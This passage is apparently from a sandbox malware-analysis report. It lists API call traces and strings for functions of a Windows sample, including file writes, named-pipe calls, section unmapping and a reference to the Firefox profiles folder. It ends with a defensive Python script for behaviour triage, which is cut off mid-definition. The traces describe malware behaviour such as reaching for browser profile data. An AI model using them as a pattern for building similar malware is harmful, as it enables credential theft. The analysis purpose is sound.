  • API String ID: 587453859-0
  • Opcode ID: 284135ccc4a6042596739f0da6f5d139cb388ced26bcc24a24efab720d4ab4ef
  • Instruction ID: faed8b72c47cb1bc77f0cf104ccb7fc234e9d1564366b5239b25521f33b16b83
  • Opcode Fuzzy Hash: 8DF0E254229DC9CED11B608A12B3793A251EF33640D7C1797B422ADA068B61713F978A
  • Instruction Fuzzy Hash: faed8b72c47cb1bc77f0cf104ccb7fc234e9d1564366b5239b25521f33b16b83
APIs
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BA6
  • SetEndOfFile.KERNEL32(01B34303,?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BB2
  • CloseHandle.KERNEL32(01B34303), ref: 01B32BBB
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BC3
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BFE
  • FlushFileBuffers.KERNEL32(00000000), ref: 01B32C08
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32C10
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 27
  • API ID: lstrcmpi$GetSystemTimeAsFileTimeRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID: Main
  • API String ID: 3521027233-521822810
  • Opcode ID: bc401ce39ed135578d671bff3c7e0c2395a673578b9a283240c4e40e0584cd5d
  • Instruction ID: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
  • Opcode Fuzzy Hash: 10E02B34084403D7901B60A90C06F18DE4EF3603C8CCE2A65C41129A061B56326E2F3B
  • Instruction Fuzzy Hash: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
APIs
  • lstrcmpi.KERNEL32(00000000,Main), ref: 001C5C44
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5C56
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5C69
  • lstrcmpi.KERNEL32(001EB260,00000000), ref: 001C5C8A
  • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,?,001C9732,00000000), ref: 001C5C9E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 4915370d64bf5c115dcc7df05119504ed8106c73e5c20004021290fc9b098e04
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: A8D0126D078B4ED4D91985A715E2F03E1915F33700E3C460872607926A8B3673AEDF49
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(01B37494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 01B34B26
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B33
  • WriteFile.KERNEL32(00000000,?,00001000,01B37494,00000000), ref: 01B34B49
  • SetEndOfFile.KERNEL32(00000000,?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B54
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B5C
  • CloseHandle.KERNEL32(00000000), ref: 01B34B65
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: SetLastErrorSleepWaitForSingleObjectmemset
  • String ID: vids
  • API String ID: 1012678829-3767230166
  • Opcode ID: a88323ab6a07f6567de602f156fbacf356d172862014bdadb632bb7e4ac17ede
  • Instruction ID: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
  • Opcode Fuzzy Hash: E1216B4906CCE1E3D8E268440463F6D32146F83DFAD4DA72667BE9A6D75F012306D629
  • Instruction Fuzzy Hash: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
APIs
  • memset.NTDLL ref: 001DD3C6
  • SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD348: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,001DD513,?,00000000,00000000,?,?,?,?,00000000,?,?,?), ref: 001DD351
    • Part of subcall function 001DD348: _aulldiv.NTDLL(00000001,?,00002710,00000000), ref: 001DD364
  • WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
  • Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 19
  • API ID: RegCloseKeyRegOpenKeySetEventWaitForSingleObject
  • String ID: %APPDATA%\Mozilla\Firefox\Profiles
  • API String ID: 2346524515-3215297822
  • Opcode ID: 04e48ca811839595ab19984103b0a713a9098f9930145295782b9b8a8acae543
  • Instruction ID: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
  • Opcode Fuzzy Hash: 64110C72556761C8C9256C84281E37A35C3FA833D3D2C7703EDA071A8B4B8261ECBD98
  • Instruction Fuzzy Hash: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
APIs
    • Part of subcall function 001D83A0: GetProcAddress.KERNEL32(001ED992,001C6C3C,00000000), ref: 001D83B4
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
    • Part of subcall function 001C3996: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001C3996: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
    • Part of subcall function 001C3996: GetLastError.KERNEL32 ref: 001C3A9B
    • Part of subcall function 001C3996: HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
    • Part of subcall function 001C3996: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
  • SetEvent.KERNEL32(00000001,001EB1D0,?,00000000), ref: 001C6C91
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • WaitForSingleObject.KERNEL32(00000000,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C6D1E
  • RegOpenKeyA.ADVAPI32(80000001,001EC992,?), ref: 001C6D4F
  • RegCloseKey.ADVAPI32(?), ref: 001C6D77
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
    • Part of subcall function 001D9029: NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 001D905A
    • Part of subcall function 001D9029: RtlNtStatusToDosError.NTDLL(C000009A), ref: 001D9095
    • Part of subcall function 001D6D18: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
    • Part of subcall function 001D6D18: GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001D6D18: ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
    • Part of subcall function 001D6D18: GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
    • Part of subcall function 001D6D18: CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
Strings
  • %APPDATA%\Mozilla\Firefox\Profiles, xrefs: 001C6CA7
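The function blocks above are raw per-function API traces; what an analyst wants from them is the behaviour each function implements. The script below is an added example, not part of this Joe Sandbox report and not Joe Sandbox code. It parses the listing format used on this page (the "APIs", "String ID" and "Instruction ID" lines, with "Part of subcall function" entries credited to the helper they belong to), decodes the CreateFileA/W access mask and creation disposition from the argument list, and matches a small behaviour table. The SIGNATURES table and the function names parse_listing, decode_createfile and triage are my assumptions for illustration; the embedded SAMPLE_LISTING is an excerpt copied from three of the blocks above (the CallNamedPipeA function, the CreateFileW/WriteFile/SetEndOfFile/CloseHandle function and the %APPDATA%\Mozilla\Firefox\Profiles function).

```python
"""Behaviour triage over Joe Sandbox function listings (added example, not Joe Sandbox code)."""
import re

RECORD_START = "Memory Dump Source"
# "• api.MODULE(args), ref: ADDR" or "• api.MODULE ref: ADDR"; lines prefixed
# "Part of subcall function ADDR:" describe a helper and are credited to it.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<callee>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
STRING_ID_LINE = re.compile(r"^\s*•\s*String ID:\s*(?P<value>.*)$")
INSTR_ID_LINE = re.compile(r"^\s*•\s*Instruction ID:\s*(?P<value>[0-9a-f]+)")
HEX32 = re.compile(r"[0-9A-F]{8}")

# Documented Win32 values for the two CreateFile* arguments that matter in triage.
ACCESS_BITS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
               0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}

# Assumed behaviour table (illustrative): each rule sees direct APIs d, helper APIs h, String ID s.
SIGNATURES = [
    ("file_write", lambda d, h, s: bool(d & {"CreateFileA", "CreateFileW"})
                                   and {"WriteFile", "CloseHandle"} <= d),
    ("directory_walk", lambda d, h, s: {"FindFirstFileW", "FindNextFileW"} <= (d | h)),
    ("named_pipe_client", lambda d, h, s: "CallNamedPipeA" in d),
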